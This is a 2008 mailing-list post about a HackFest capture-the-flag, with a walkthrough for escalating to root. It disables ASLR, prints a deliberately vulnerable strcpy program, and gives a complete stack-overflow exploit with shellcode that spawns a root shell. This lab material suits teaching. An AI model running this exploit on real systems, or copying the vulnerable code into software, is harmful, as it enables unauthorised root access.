HackFest Series: FLAGS!

Lisa Kachold lisakachold at obnosis.com
Sat Dec 13 16:49:37 MST 2008 

None got root yet!



We are leaving the target up available at http://24.251.219.96:8088

It's still open for encroachment through the weekend!

HackFest results:
http://plug.phoenix.az.us/comment/edit/126

Kudos to:
PAVLOS KAIRIS TOOK the first SSH FLAG as nobody
RW who followed by getting mysql access via SSH
DrRabbit (Tuna) for his Windows Work OffFest!

Here's how to escalate to root via overflowing the buffer:

I turned off kernel protection for Linux kernels (a hole in kernels younger than 2.6-18):
echo 0 > /proc/sys/kernel/randomize_va_space

So you should be able to exploit this code:

#include <stdio.h>
#include <stdlib.h>

// 1024 bytes buffer
// 4 bytes to overwrite ebp
// 4 bytes to overwrite eip
// 1032 bytes :)

void viewer(char *string)
{
char buffer[1024];

strcpy(buffer,string);

printf("You have entered: %s\n",buffer);

return;
}

int main(int argc, char *argv[])
{

if(argc < 2)
{
printf("%s <something> \n",argv[0]);
return 0;
}

viewer(argv[1]);
return 0;
}


---cut here--end

This works:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90 // defining the NOP
#define VUL_FILE "./vuln"

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x 68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x 04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x 50\x68\x6e" // our shellcode
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x 24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x 80";

unsigned long get_sp(void)
{
__asm__("movl %esp, %eax"); // this function returns the stack pointer address, hopefully where
} // our shellcode is stored.

int main(int argc, char *argv[], char **envp)
{
int buff = 1032; // size of the vuln buffer.
unsigned long addr = get_sp(); // addr of shellcode.
char *ptr; // used for adding nops etc.
if(argc > 1)
buff = atoi(argv[1]); // if the user supplies a size, use this instead.

if((buff % 4) != 0) // if the size is not a mem addr (divisable by 4)
buff = buff + 4 - (buff % 4); // add 4 to it, take away the remainder (makes it divisable by 4)

if((ptr = (char *)malloc(buff)) == NULL) // check to see you allocated enough memory.
{
printf("Error allocating memory.\n");
exit(0);
}
memset(ptr, NOP, buff); // fill the buffer with NOPS making our chances higher.
memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // store the shellcode in the buffer.
*(long *)&ptr[buff - 4] = addr; // make eip point to our shellcode.
execl(VUL_FILE, "exploit example1", ptr, NULL); // execute the vuln program with our NOPS&shellcode in the buffer.
printf("Addr: %s\n",addr);
return 0;
}

---end--

Easy as pI, right?

get it?

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452
Catch the January PLUG HackFest!   Kristy Westphal, CSO for the AZ Department of Economic
Security will provide a one hour
presentation on forensics 1/10/09 Noon at UAT.edu.



_________________________________________________________________
Send e-mail faster without improving your typing skills.
http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_speed_122008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081213/fe163a0b/attachment.htm

More information about the PLUG-discuss mailing list